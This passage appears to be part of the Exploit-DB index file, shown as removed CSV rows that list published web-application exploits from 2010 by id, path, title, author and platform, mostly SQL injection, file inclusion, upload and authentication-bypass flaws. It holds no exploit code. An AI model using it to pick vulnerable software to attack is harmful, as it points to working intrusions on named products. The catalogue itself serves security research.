-11522,exploits/php/webapps/11522.txt,"Ero Auktion 2010 - 'news.php' SQL Injection",2010-02-22,"Easy Laster",php,webapps, -11523,exploits/php/webapps/11523.txt,"Galerie Dezign-Box France - Multiple Vulnerabilities",2010-02-22,indoushka,php,webapps, -11524,exploits/php/webapps/11524.txt,"Arab Cart 1.0.2.0 - Multiple Vulnerabilities",2010-02-22,indoushka,php,webapps, -11526,exploits/php/webapps/11526.txt,"vBSEO 3.1.0 - Local File Inclusion",2010-02-22,ViRuSMaN,php,webapps, -11527,exploits/multiple/webapps/11527.html,"cPanel - Multiple Cross-Site Request Forgery Vulnerabilities",2010-02-22,SecurityRules,multiple,webapps, -11528,exploits/php/webapps/11528.txt,"phpBugTracker 1.0.1 - File Disclosure",2010-02-22,ViRuSMaN,php,webapps, -11530,exploits/php/webapps/11530.txt,"Article Friendly - SQL Injection",2010-02-22,SkuLL-HackeR,php,webapps, -11543,exploits/php/webapps/11543.txt,"Softbiz Jobs - Cross-Site Request Forgery",2010-02-23,"pratul agrawal",php,webapps, -11544,exploits/php/webapps/11544.php,"Joomla! Component com_ice - Blind SQL Injection",2010-02-23,snakespc,php,webapps, -11547,exploits/php/webapps/11547.txt,"PHP Auktion Pro SQL - 'news.php' SQL Injection",2010-02-23,"Easy Laster",php,webapps, -11548,exploits/php/webapps/11548.txt,"Top Auktion - 'news.php' SQL Injection",2010-02-23,"Easy Laster",php,webapps, -11549,exploits/php/webapps/11549.pl,"Joomla! Component user_id com_sqlreport - Blind SQL Injection",2010-02-23,snakespc,php,webapps, -11550,exploits/php/webapps/11550.txt,"WorkSimple 1.3.2 - Multiple Vulnerabilities",2010-02-23,JIKO,php,webapps, -11551,exploits/php/webapps/11551.txt,"Softbiz Jobs - Multiple SQL Injections",2010-02-23,"Easy Laster",php,webapps, -11553,exploits/php/webapps/11553.txt,"Tinypug 0.9.5 - Cross-Site Request Forgery (Password Change)",2010-02-23,AmnPardaz,php,webapps, -11554,exploits/php/webapps/11554.txt,"QuickDev 4 PHP - Database Disclosure",2010-02-23,ViRuSMaN,php,webapps, -11555,exploits/asp/webapps/11555.txt,"bispage - Bypass",2010-02-23,SaMir-BonD,asp,webapps, -11557,exploits/php/webapps/11557.txt,"Max's Photo Album - Arbitrary File Upload",2010-02-24,indoushka,php,webapps, -11558,exploits/php/webapps/11558.txt,"MySmartBB 1.0.0 - Cross-Site Scripting",2010-02-24,indoushka,php,webapps, -11559,exploits/php/webapps/11559.txt,"Article Friendly - Cross-Site Request Forgery",2010-02-24,"pratul agrawal",php,webapps, -11560,exploits/php/webapps/11560.txt,"WikyBlog 1.7.3rc2 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps, -11563,exploits/php/webapps/11563.txt,"kalimat new system 1.0 - 'index.php' SQL Injection",2009-11-16,ProF.Code,php,webapps, -11564,exploits/php/webapps/11564.txt,"ShortCMS 1.11F(B) (con) - SQL Injection",2010-02-24,Gamoscu,php,webapps, -11565,exploits/php/webapps/11565.txt,"PHPCOIN 1.2.1 - 'mod.php' SQL Injection",2010-02-24,BAYBORA,php,webapps, -11568,exploits/php/webapps/11568.txt,"Softbiz Auktios Script - Multiple SQL Injections",2010-02-24,"Easy Laster",php,webapps, -11569,exploits/php/webapps/11569.txt,"Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps, -11570,exploits/php/webapps/11570.txt,"PBBoard 2.0.5 - Multiple Vulnerabilities",2010-02-24,indoushka,php,webapps, -11571,exploits/php/webapps/11571.txt,"Maian Uploader 4.0 - Arbitrary File Upload",2010-02-24,indoushka,php,webapps, -11575,exploits/php/webapps/11575.txt,"Softbiz Classifieds PLUS - Multiple SQL Injections",2010-02-24,"Easy Laster",php,webapps, -11576,exploits/php/webapps/11576.txt,"Softbiz Recipes Portal Script - 'showcats.php' SQL Injection",2010-02-25,"Easy Laster",php,webapps, -11577,exploits/php/webapps/11577.txt,"GameScript 3.0 - SQL Injection",2010-02-25,FormatXformat,php,webapps, -11578,exploits/php/webapps/11578.php,"Joomla! Component com_Joomlaconnect_be - Blind Injection",2010-02-25,snakespc,php,webapps, -11579,exploits/php/webapps/11579.txt,"WebAdministrator Lite CMS - SQL Injection",2010-02-25,Ariko-Security,php,webapps, -11580,exploits/aix/webapps/11580.txt,"FileExecutive 1 - Multiple Vulnerabilities",2010-02-26,ViRuSMaN,aix,webapps, -11582,exploits/php/webapps/11582.txt,"DZ Erotik Auktionshaus 4.rgo - 'news.php' SQL Injection",2010-02-27,"Easy Laster",php,webapps, -11583,exploits/php/webapps/11583.pl,"Gravity Board X 2.0 Beta (Public Release 3) - SQL Injection",2010-02-27,Ctacok,php,webapps, -11584,exploits/php/webapps/11584.txt,"Project Man 1.0 - Authentication Bypass",2010-02-27,cr4wl3r,php,webapps, -11585,exploits/php/webapps/11585.txt,"phpCDB 1.0 - Local File Inclusion",2010-02-27,cr4wl3r,php,webapps, -11586,exploits/php/webapps/11586.txt,"phpRAINCHECK 1.0.1 - SQL Injection",2010-02-27,cr4wl3r,php,webapps, -11587,exploits/php/webapps/11587.txt,"ProMan 0.1.1 - Multiple File Inclusions",2010-02-27,cr4wl3r,php,webapps, -11588,exploits/php/webapps/11588.txt,"phpMySite - Cross-Site Scripting / SQL Injection",2010-02-27,Crux,php,webapps, -11589,exploits/asp/webapps/11589.txt,"Pre Classified Listings - SQL Injection",2010-02-27,Crux,asp,webapps, -11592,exploits/php/webapps/11592.txt,"Scripts Feed Business Directory - SQL Injection",2010-02-27,Crux,php,webapps, -11593,exploits/php/webapps/11593.txt,"Uiga Fan Club 1.0 - Authentication Bypass",2010-02-27,cr4wl3r,php,webapps, -11595,exploits/php/webapps/11595.php,"Joomla! Component com_paxgallery - Blind Injection",2010-02-27,snakespc,php,webapps, -11596,exploits/php/webapps/11596.txt,"Slaed CMS 4.0 - Multiple Vulnerabilities",2010-02-27,indoushka,php,webapps, -11599,exploits/php/webapps/11599.txt,"Uiga Personal Portal - 'index.php' SQL Injection",2010-02-28,"Easy Laster",php,webapps, -11600,exploits/php/webapps/11600.txt,"Uiga Fan Club - 'index.php' SQL Injection",2010-02-28,"Easy Laster",php,webapps, -11602,exploits/php/webapps/11602.txt,"HazelPress Lite 0.0.4 - Authentication Bypass",2010-02-28,cr4wl3r,php,webapps, -11603,exploits/php/webapps/11603.txt,"Joomla! Component com_yanc - SQL Injection",2010-02-28,snakespc,php,webapps, -11604,exploits/php/webapps/11604.php,"Joomla! Component com_liveticker - Blind SQL Injection",2010-02-28,snakespc,php,webapps, -11605,exploits/php/webapps/11605.txt,"Baykus Yemek Tarifleri 2.1 - SQL Injection",2010-02-28,cr4wl3r,php,webapps, -11606,exploits/asp/webapps/11606.txt,"Majoda CMS - Authentication Bypass",2010-02-28,Phenom,asp,webapps, -11609,exploits/php/webapps/11609.txt,"phptroubleticket 2.0 - 'id' SQL Injection",2010-03-01,kaMtiEz,php,webapps, -11610,exploits/php/webapps/11610.txt,"CMS by MyWorks - Multiple Vulnerabilities",2010-03-01,Palyo34,php,webapps, -11611,exploits/asp/webapps/11611.txt,"Al Sat Scripti - Database Disclosure",2010-03-02,indoushka,asp,webapps, -11612,exploits/php/webapps/11612.txt,"osCSS 1.2.1 - Database Backups Disclosure",2010-03-02,indoushka,php,webapps, -11613,exploits/php/webapps/11613.txt,"PHP Advanced Transfer Manager 1.10 - Arbitrary File Upload",2010-03-02,indoushka,php,webapps, -11614,exploits/php/webapps/11614.txt,"Uploadify Sample Collection - Arbitrary File Upload",2010-03-02,indoushka,php,webapps, -11616,exploits/php/webapps/11616.txt,"My Little Forum - 'contact.php' SQL Injection",2010-03-02,"Easy Laster",php,webapps, -11619,exploits/php/webapps/11619.txt,"Uiga Church Portal - 'index.php' SQL Injection",2010-03-02,"Easy Laster",php,webapps, -11620,exploits/php/webapps/11620.txt,"Dosya Yukle Scrtipi (DosyaYukle Scripti) 1.0 - Arbitrary File Upload",2010-03-03,indoushka,php,webapps, -11621,exploits/php/webapps/11621.txt,"Gnat-TGP 1.2.20 - Remote File Inclusion",2010-03-03,cr4wl3r,php,webapps, -11623,exploits/php/webapps/11623.txt,"smartplugs 1.3 - 'showplugs.php' SQL Injection",2010-03-03,"Easy Laster",php,webapps, -11624,exploits/php/webapps/11624.pl,"MiNBank 1.5.0 - Remote Command Execution",2010-03-03,JosS,php,webapps, -11625,exploits/php/webapps/11625.txt,"Joomla! Component com_blog - Directory Traversal",2010-03-03,"DevilZ TM",php,webapps, -11627,exploits/php/webapps/11627.txt,"PHP-Nuke CMS (Survey and Poll) - SQL Injection",2010-03-04,SENOT,php,webapps, -11631,exploits/php/webapps/11631.txt,"PHP-Nuke - 'user.php' SQL Injection",2010-03-04,"Easy Laster",php,webapps, -11634,exploits/hardware/webapps/11634.pl,"Sagem Routers - Remote Authentication Bypass",2010-03-04,AlpHaNiX,hardware,webapps, -11635,exploits/php/webapps/11635.pl,"OneCMS 2.5 - SQL Injection",2010-03-05,"Ctacok & .:[melkiy]:",php,webapps, -11636,exploits/php/webapps/11636.php,"Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass",2010-03-05,"Hamid Ebadi",php,webapps, -11637,exploits/php/webapps/11637.txt,"Auktionshaus 3.0.0.1 - 'news.php?id' SQL Injection",2010-03-05,"Easy Laster",php,webapps, -11638,exploits/php/webapps/11638.txt,"E-topbiz Link ADS 1 PHP script - 'linkid' Blind SQL Injection",2010-03-05,JosS,php,webapps, -11641,exploits/php/webapps/11641.txt,"PHPCOIN 1.2.1 - 'mod.php' Local File Inclusion",2010-03-06,_mlk_,php,webapps, -11643,exploits/php/webapps/11643.txt,"dev4u CMS (Personenseiten) - 'go_target.php' SQL Injection",2010-03-06,"Easy Laster",php,webapps, -11646,exploits/php/webapps/11646.pl,"BigForum 4.5 - SQL Injection",2010-03-07,Ctacok,php,webapps, -11648,exploits/php/webapps/11648.txt,"Bild Flirt System 2.0 - 'index.php?id' SQL Injection",2010-03-07,"Easy Laster",php,webapps, -11654,exploits/php/webapps/11654.txt,"DZ Auktionshaus 'V4.rgo' - 'id' news.php?SQL Injection",2010-03-08,"Easy Laster",php,webapps, -11655,exploits/php/webapps/11655.txt,"TRIBISUR 2.0 - Local File Inclusion",2010-03-08,cr4wl3r,php,webapps, -11657,exploits/php/webapps/11657.txt,"Chaton 1.5.2 - Local File Inclusion",2010-03-08,cr4wl3r,php,webapps, -11660,exploits/php/webapps/11660.txt,"PHP File Sharing System 1.5.1 - Multiple Vulnerabilities",2010-03-09,blake,php,webapps, -11666,exploits/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re_ R4vax",php,webapps, -11667,exploits/php/webapps/11667.txt,"Joomla! Component com_hezacontent 1.0 - 'id' SQL Injection",2010-03-09,kaMtiEz,php,webapps, -11671,exploits/php/webapps/11671.txt,"mhproducts Kleinanzeigenmarkt - 'search.php' SQL Injection",2010-03-09,"Easy Laster",php,webapps, -11672,exploits/php/webapps/11672.txt,"Wild CMS - SQL Injection",2010-03-09,Ariko-Security,php,webapps, -11674,exploits/php/webapps/11674.txt,"nus newssystem 1.02 - 'id' SQL Injection",2010-03-09,n3w7u,php,webapps, -11676,exploits/php/webapps/11676.txt,"Campsite 3.3.5 - Cross-Site Request Forgery",2010-03-10,"pratul agrawal",php,webapps, -11677,exploits/hardware/webapps/11677.txt,"Friendly-Tech FriendlyTR69 CPE Remote Management 2.8.9 - SQL Injection",2010-03-10,"Yaniv Miron",hardware,webapps, -11678,exploits/php/webapps/11678.txt,"PhpCityPortal - Multiple Vulnerabilities",2010-03-10,R3d-D3V!L,php,webapps, -11679,exploits/php/webapps/11679.txt,"Softbiz Jobs and Recruitment Script - 'search_result.php' SQL Injection",2010-03-10,"Easy Laster",php,webapps, -11680,exploits/php/webapps/11680.txt,"Gazelle CMS - Cross-Site Request Forgery",2010-03-10,"pratul agrawal",php,webapps, -11681,exploits/php/webapps/11681.txt,"ispCP Omega 1.0.4 - Remote File Inclusion",2010-03-10,cr4wl3r,php,webapps, -11684,exploits/php/webapps/11684.txt,"Joomla! Component com_about - SQL Injection",2010-03-11,snakespc,php,webapps, -11685,exploits/php/webapps/11685.txt,"ATutor 1.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2010-03-11,ITSecTeam,php,webapps, -11686,exploits/php/webapps/11686.txt,"ANE CMD CRSF - Arbitrary Add Admin",2010-03-11,"pratul agrawal",php,webapps, -11687,exploits/php/webapps/11687.txt,"Ane CMS 1 - Persistent Cross-Site Scripting",2010-03-11,"pratul agrawal",php,webapps, -11688,exploits/php/webapps/11688.txt,"Joomla! Component com_blog - SQL Injection",2010-03-11,"DevilZ TM",php,webapps, -11689,exploits/php/webapps/11689.txt,"Eros Erotik Webkatalog - 'start.php?id' SQL Injection",2010-03-11,"Easy Laster",php,webapps, -11691,exploits/php/webapps/11691.txt,"Joomla! Component com_products - 'intCategoryId' SQL Injection",2010-03-11,N2n-Hacker,php,webapps, -11692,exploits/php/webapps/11692.txt,"Joomla! Component com_gigfe - SQL Injection",2010-03-11,"DevilZ TM",php,webapps, -11693,exploits/php/webapps/11693.txt,"Joomla! Component com_color - SQL Injection",2010-03-11,"DevilZ TM",php,webapps, -11695,exploits/php/webapps/11695.txt,"Joomla! Component com_party - SQL Injection",2010-03-11,"DevilZ TM",php,webapps, -11696,exploits/php/webapps/11696.txt,"Joomla! Component com_start - SQL Injection",2010-03-12,"DevilZ TM",php,webapps, -11698,exploits/php/webapps/11698.txt,"Joomla! Component com_leader - SQL Injection",2010-03-12,"DevilZ TM",php,webapps, -11699,exploits/php/webapps/11699.txt,"Joomla! Component com_family - SQL Injection",2010-03-12,"DevilZ TM",php,webapps, -11701,exploits/php/webapps/11701.txt,"Easynet Forum Host - 'topic.php' SQL Injection",2010-03-12,"Yakir Wizman",php,webapps, -11702,exploits/php/webapps/11702.pl,"Invision Power Board Currency Mod 1.3 - 'edit' SQL Injection",2010-03-12,"Yakir Wizman",php,webapps, -11704,exploits/php/webapps/11704.txt,"dreamlive Auktionshaus script - 'news.php?id' SQL Injection",2010-03-12,"Easy Laster",php,webapps, -11707,exploits/php/webapps/11707.txt,"Joomla! Component com_juliaportfolio - Local File Inclusion",2010-03-12,"DevilZ TM",php,webapps,80 -11708,exploits/php/webapps/11708.txt,"Joomla! Component com_sbsfile - Local File Inclusion",2010-03-13,"DevilZ TM",php,webapps, -11709,exploits/php/webapps/11709.txt,"Joomla! Component com_comp - SQL Injection",2010-03-13,"DevilZ TM",php,webapps, -11710,exploits/php/webapps/11710.php,"Joomla! Component com_races - Blind SQL Injection",2010-03-13,"DevilZ TM",php,webapps, -11711,exploits/php/webapps/11711.txt,"Azeno CMS - SQL Injection",2010-03-13,"DevilZ TM",php,webapps, -11715,exploits/php/webapps/11715.txt,"systemsoftware Community Black - 'index.php' SQL Injection",2010-03-13,"Easy Laster",php,webapps, -11718,exploits/php/webapps/11718.txt,"Xbtit 2.0.0 - SQL Injection",2010-03-13,Ctacok,php,webapps, -11719,exploits/php/webapps/11719.txt,"Mambo Component MambAds - SQL Injection",2010-03-13,Dreadful,php,webapps, -11721,exploits/php/webapps/11721.txt,"GeekHelps ADMP 1.01 - Multiple Vulnerabilities",2010-03-13,ITSecTeam,php,webapps, -11722,exploits/php/webapps/11722.txt,"Ad Board Script 1.01 - Local File Inclusion",2010-03-13,ITSecTeam,php,webapps, -11723,exploits/cgi/webapps/11723.pl,"Trouble Ticket Express 3.01 - Remote Code Execution / Directory Traversal",2010-03-14,zombiefx,cgi,webapps, -11725,exploits/php/webapps/11725.txt,"Joomla! Component com_org - SQL Injection",2010-03-14,N2n-Hacker,php,webapps, -11726,exploits/php/webapps/11726.txt,"PHP-Fusion 6.01.15.4 - 'downloads.php' SQL Injection",2010-03-14,Inj3ct0r,php,webapps, -11727,exploits/php/webapps/11727.txt,"Front Door 0.4b - SQL Injection",2010-03-14,blake,php,webapps, -11729,exploits/php/webapps/11729.txt,"DesktopOnNet 3 Beta9 - Local File Inclusion",2010-03-14,cr4wl3r,php,webapps, -40084,exploits/php/webapps/40084.txt,"IPS Community Suite 4.1.12.3 - PHP Code Injection",2016-07-11,"Egidio Romano",php,webapps,80 -11730,exploits/php/webapps/11730.txt,"Joomla! Component com_nfnaddressbook - SQL Injection",2010-03-14,snakespc,php,webapps, -11731,exploits/php/webapps/11731.html,"RogioBiz PHP Fle Manager 1.2 - Admin Bypass",2010-03-14,ITSecTeam,php,webapps, -11732,exploits/php/webapps/11732.txt,"PHP-Nuke - Local File Inclusion",2010-03-14,ITSecTeam,php,webapps, -11733,exploits/php/webapps/11733.txt,"PHPpool media Domain Verkaufs und Auktions Portal - 'index.php' SQL Injection",2010-03-14,"Easy Laster",php,webapps, -11735,exploits/php/webapps/11735.php,"DZCP (deV!L_z Clanportal) 1.5.2 - Remote File Inclusion",2010-03-14,cr4wl3r,php,webapps, -18428,exploits/php/webapps/18428.txt,"HostBill App 2.3 - Remote Code Injection",2012-01-30,Dr.DaShEr,php,webapps, -11737,exploits/php/webapps/11737.txt,"PhpMyLogon 2.0 - SQL Injection",2010-03-14,blake,php,webapps, -11738,exploits/php/webapps/11738.txt,"Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion",2010-03-15,jdc,php,webapps, -11739,exploits/php/webapps/11739.txt,"PHP Classifieds 7.5 - Blind SQL Injection",2010-03-15,ITSecTeam,php,webapps, -11740,exploits/php/webapps/11740.txt,"Ninja RSS Syndicator 1.0.8 - Local File Inclusion",2010-03-15,jdc,php,webapps, -11741,exploits/php/webapps/11741.txt,"Phenix 3.5b - SQL Injection",2010-03-15,ITSecTeam,php,webapps, -11743,exploits/php/webapps/11743.txt,"Joomla! Component com_rpx Ulti RPX 2.1.0 - Local File Inclusion",2010-03-15,jdc,php,webapps, -11744,exploits/php/webapps/11744.txt,"Duhok Forum 1.0 script - Cross-Site Scripting",2010-03-15,indoushka,php,webapps, -11745,exploits/php/webapps/11745.txt,"FreeHost 1.00 - Arbitrary File Upload",2010-03-15,indoushka,php,webapps, -11746,exploits/php/webapps/11746.txt,"Torrent Hoster - Remount Upload",2010-03-15,EL-KAHINA,php,webapps, -11747,exploits/php/webapps/11747.txt,"CH-CMS.ch 2 - Arbitrary File Upload",2010-03-15,EL-KAHINA,php,webapps, -11748,exploits/php/webapps/11748.txt,"Interspire SHOPPING CART 5.5.4 - Ultimate Edition backup dump",2010-03-15,indoushka,php,webapps, -11749,exploits/php/webapps/11749.txt,"Subdreamer 3.0.1 - CMS upload",2010-03-15,indoushka,php,webapps, -11752,exploits/php/webapps/11752.txt,"Joomla! Component com_org - 'letter' SQL Injection",2010-03-15,kazuya,php,webapps, -11754,exploits/php/webapps/11754.txt,"Address Book Script 1.09 - Local File Inclusion",2010-03-15,"Pouya Daneshmand",php,webapps, -11755,exploits/php/webapps/11755.txt,"osDate 2.1.9 - Remote File Inclusion",2010-03-15,NoGe,php,webapps, -11756,exploits/php/webapps/11756.txt,"Joomla! Component com_linkr - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,php,webapps, -11757,exploits/php/webapps/11757.txt,"Joomla! Component com_janews - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,php,webapps, -11758,exploits/php/webapps/11758.txt,"Joomla! Component com_ganalytics - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,php,webapps, -11759,exploits/php/webapps/11759.txt,"Joomla! Component com_sectionex - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,php,webapps, -11760,exploits/php/webapps/11760.txt,"Joomla! Component com_rokdownloads - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,php,webapps, -11761,exploits/php/webapps/11761.txt,"Preisschlacht 4.0 Flash System - 'index.php?aid' SQL Injection",2010-03-15,"Easy Laster",php,webapps, -11766,exploits/php/webapps/11766.txt,"Joomla! Component com_bidding - SQL Injection",2010-03-15,N2n-Hacker,php,webapps, -11767,exploits/php/webapps/11767.txt,"Joomla! Component com_route - SQL Injection",2010-03-15,N2n-Hacker,php,webapps, -11768,exploits/php/webapps/11768.txt,"Newbie CMS - File Disclosure",2010-03-15,JIKO,php,webapps, -11771,exploits/php/webapps/11771.txt,"osCMax 2.0 - 'FCKeditor' Arbitrary File Upload",2010-03-16,ITSecTeam,php,webapps, -11772,exploits/php/webapps/11772.txt,"Joomla! Component com_rwcards - Local File Inclusion",2010-03-16,ALTBTA,php,webapps, -11773,exploits/php/webapps/11773.txt,"Free Real Estate Contact Form 1.09 - Local File Inclusion",2010-03-16,"Pouya Daneshmand",php,webapps, -11774,exploits/php/webapps/11774.txt,"Online Community CMS by I-net - SQL Injection",2010-03-16,"Th3 RDX",php,webapps, -11775,exploits/php/webapps/11775.txt,"Short URL 1.01 - Local File Inclusion",2010-03-16,"Pouya Daneshmand",php,webapps, -11776,exploits/php/webapps/11776.txt,"phpscripte24 Auktionshaus Community Standart System - Blind SQL Injection",2010-03-16,"Easy Laster",php,webapps, -11777,exploits/php/webapps/11777.txt,"eGroupWare 1.6.002 and eGroupWare premium line 9.1 - Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",php,webapps, -11778,exploits/php/webapps/11778.txt,"OSSIM 2.2 - Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",php,webapps, -11780,exploits/php/webapps/11780.html,"Clain_TIger_CMS - Cross-Site Request Forgery",2010-03-17,"pratul agrawal",php,webapps, -11781,exploits/php/webapps/11781.html,"ChillyCMS - Cross-Site Request Forgery",2010-03-17,"pratul agrawal",php,webapps, -11782,exploits/php/webapps/11782.txt,"Joomla! Component com_include - SQL Injection",2010-03-17,"DevilZ TM",php,webapps, -11783,exploits/php/webapps/11783.txt,"Preisschlacht Multi Liveshop System - 'index.php?aid' SQL Injection",2010-03-17,"Easy Laster",php,webapps, -11784,exploits/php/webapps/11784.txt,"PostNuke FormExpress Module - Blind SQL Injection",2010-03-17,"Ali Abbasi",php,webapps, -11785,exploits/php/webapps/11785.txt,"Joomla! Component com_ckforms - Multiple Vulnerabilities",2010-03-17,ALTBTA,php,webapps, -11788,exploits/php/webapps/11788.txt,"PHP-Nuke - ratedownload SQL Injection",2010-03-17,ITSecTeam,php,webapps, -11790,exploits/php/webapps/11790.txt,"Joomla! Component com_vxdate - Multiple Vulnerabilities",2010-03-17,MustLive,php,webapps, -11793,exploits/jsp/webapps/11793.txt,"ManageEngine ServiceDesk Plus 7.6 - woID SQL Injection",2010-03-18,"Nahuel Grisolia",jsp,webapps, -11795,exploits/php/webapps/11795.txt,"DewNewPHPLinks 2.1.0.1 - Local File Inclusion",2010-03-18,ITSecTeam,php,webapps, -11799,exploits/php/webapps/11799.txt,"SiteDone Custom Edition 2.0 - SQL Injection / Cross-Site Scripting",2010-03-18,d3v1l,php,webapps, -11801,exploits/php/webapps/11801.txt,"phpAuthent 0.2.1 - SQL Injection",2010-03-18,Gamoscu,php,webapps, -11802,exploits/php/webapps/11802.txt,"philboard 1.02 - SQL Injection",2010-03-18,ViRuS_HiMa,php,webapps, -11805,exploits/php/webapps/11805.txt,"phpscripte24 Niedrig Gebote Pro Auktions System II - Blind SQL Injection",2010-03-18,"Easy Laster",php,webapps, -11806,exploits/php/webapps/11806.txt,"nensor CMS 2.01 - Multiple Vulnerabilities",2010-03-18,cr4wl3r,php,webapps, -11807,exploits/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Inclusions",2010-03-18,cr4wl3r,php,webapps, -11808,exploits/php/webapps/11808.txt,"quality point 1.0 newsfeed - SQL Injection / Cross-Site Scripting",2010-03-19,Red-D3v1L,php,webapps, -11811,exploits/php/webapps/11811.txt,"PHPscripte24 Preisschlacht Liveshop System - 'index.php?aid' SQL Injection",2010-03-19,"Easy Laster",php,webapps, -11813,exploits/php/webapps/11813.txt,"DirectAdmin 1.34.4 - Multiple Cross-Site Request Forgerys",2010-03-19,K053,php,webapps, -11814,exploits/php/webapps/11814.txt,"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion",2010-03-19,"Chip d3 bi0s",php,webapps, -11815,exploits/php/webapps/11815.txt,"Joomla! Component Gift Exchange com_giftexchange 1.0 Beta - 'pkg' SQL Injection",2010-03-20,"Chip d3 bi0s",php,webapps, -11816,exploits/php/webapps/11816.txt,"Pay Per Watch & Bid Auktions System - 'auktion.php?id_auk' Blind SQL Injection",2010-03-20,"Easy Laster",php,webapps, -11823,exploits/cgi/webapps/11823.txt,"Trouble Ticket Software - 'ttx.cgi' Arbitrary File Download",2010-03-20,n01d,cgi,webapps, -11824,exploits/php/webapps/11824.py,"Woltlab Burning Board Teamsite Hack 3.0 - 'ts_other.php' SQL Injection",2010-03-21,"Easy Laster",php,webapps, -11825,exploits/php/webapps/11825.html,"Adult Video Site Script - Multiple Vulnerabilities",2010-03-21,indoushka,php,webapps, -11826,exploits/php/webapps/11826.txt,"Jewelry Cart Software - 'product.php' SQL Injection",2010-03-21,Asyraf,php,webapps, -11829,exploits/php/webapps/11829.txt,"Woltlab Burning Board Lite Addon - 'lexikon.php' SQL Injection",2010-03-21,n3w7u,php,webapps, -11830,exploits/php/webapps/11830.txt,"Fw-BofF (oolime-resurrection) 1.5.3beta - Multiple Remote File Inclusions",2010-03-21,cr4wl3r,php,webapps, -11831,exploits/php/webapps/11831.txt,"WebMaid CMS 0.2-6 Beta - Multiple Remote File Inclusions",2010-03-21,cr4wl3r,php,webapps, -11832,exploits/php/webapps/11832.txt,"NotSopureEdit 1.4.1 - Remote File Inclusion",2010-03-21,cr4wl3r,php,webapps, -11833,exploits/php/webapps/11833.txt,"4x CMS r26 - Authentication Bypass",2010-03-21,cr4wl3r,php,webapps, -11835,exploits/php/webapps/11835.txt,"Mini-CMS RibaFS 1.0 - Authentication Bypass",2010-03-22,cr4wl3r,php,webapps, -11836,exploits/php/webapps/11836.txt,"CMS Openpage - 'index.php' SQL Injection",2010-03-22,Phenom,php,webapps, -14128,exploits/php/webapps/14128.txt,"Joomla! Component com_wmtpic 1.0 - SQL Injection",2010-06-30,RoAd_KiLlEr,php,webapps, -11837,exploits/php/webapps/11837.txt,"Uiga Fan Club - SQL Injection",2010-03-22,"Sioma Labs",php,webapps, -11840,exploits/php/webapps/11840.txt,"PowieSys 0.7.7 alpha - 'index.php' shownews SQL Injection",2010-03-22,"Easy Laster",php,webapps, -11841,exploits/php/webapps/11841.txt,"New Advisore Stack 1.1 - Directory Traversal",2010-03-22,R3VAN_BASTARD,php,webapps, -11844,exploits/php/webapps/11844.txt,"Joomla! Component com_flash - SQL Injection",2010-03-22,"DevilZ TM",php,webapps, -11845,exploits/php/webapps/11845.txt,"Joomla! Component com_jwmmxtd - Remote File Inclusion",2010-03-23,eidelweiss,php,webapps, -11846,exploits/php/webapps/11846.txt,"Uiga Business Portal - 'index.php' SQL Injection",2010-03-23,"Easy Laster",php,webapps, -11847,exploits/windows/webapps/11847.txt,"Joomla! Component com_gds - SQL Injection",2010-03-23,"DevilZ TM",windows,webapps, -11848,exploits/php/webapps/11848.txt,"Insky CMS 006-0111 - Multiple Remote File Inclusions",2010-03-23,mat,php,webapps, -11850,exploits/php/webapps/11850.txt,"Zephyrus CMS - 'index.php' SQL Injection",2010-03-23,Phenom,php,webapps, -11851,exploits/php/webapps/11851.txt,"Joomla! Component Property - Local File Inclusion",2010-03-23,"Chip d3 bi0s",php,webapps, -11852,exploits/php/webapps/11852.txt,"Xataface - Admin Authentication Bypass",2010-03-23,Xinapse,php,webapps, -11853,exploits/php/webapps/11853.txt,"Joomla! Component SMEStorage - Local File Inclusion",2010-03-23,"Chip d3 bi0s",php,webapps, -11862,exploits/php/webapps/11862.txt,"Easy-Clanpage 2.0 - Blind SQL Injection",2010-03-24,"Easy Laster",php,webapps, -11863,exploits/php/webapps/11863.txt,"CMS By SoftnSolv - 'index.php' SQL Injection",2010-03-24,"Th3 RDX",php,webapps, -11864,exploits/php/webapps/11864.txt,"E-PHP CMS - SQL Injection",2010-03-24,"Th3 RDX",php,webapps, -11865,exploits/php/webapps/11865.txt,"Joomla! Component com_universal - Remote File Inclusion",2010-03-24,eidelweiss,php,webapps, -11866,exploits/php/webapps/11866.txt,"New-CMS - Local File Inclusion",2010-03-24,Xash,php,webapps, -11867,exploits/php/webapps/11867.txt,"Joomla! Component com_wallpapers - SQL Injection",2010-03-24,"DevilZ TM",php,webapps, -11868,exploits/php/webapps/11868.txt,"Joomla! Component com_software - SQL Injection",2010-03-24,"DevilZ TM",php,webapps, -11871,exploits/php/webapps/11871.txt,"vBulletin Blog 4.0.2 - Title Cross-Site Scripting",2010-03-24,FormatXformat,php,webapps, -11873,exploits/php/webapps/11873.txt,"Interactivefx.ie CMS - SQL Injection",2010-03-25,Inj3ct0r,php,webapps, -11874,exploits/php/webapps/11874.txt,"INVOhost - SQL Injection",2010-03-25,"Andrés Gómez",php,webapps, -11875,exploits/php/webapps/11875.py,"Easy-Clanpage 2.01 - SQL Injection",2010-03-25,"Easy Laster",php,webapps, -11876,exploits/php/webapps/11876.txt,"justVisual 2.0 - 'index.php' Local File Inclusion",2010-03-25,eidelweiss,php,webapps, -11881,exploits/php/webapps/11881.php,"SiteX CMS 0.7.4 Beta - 'photo.php' SQL Injection",2010-03-25,Sc0rpi0n,php,webapps, -11882,exploits/php/webapps/11882.txt,"Direct News 4.10.2 - Multiple Remote File Inclusions",2010-03-25,mat,php,webapps, -11883,exploits/php/webapps/11883.txt,"WebsiteBaker 2.8.1 - DataBase Backup Disclosure",2010-03-25,Tr0y-x,php,webapps, -11884,exploits/php/webapps/11884.txt,"Joomla! Component dcsFlashGames 2.0RC1 - 'catid' SQL 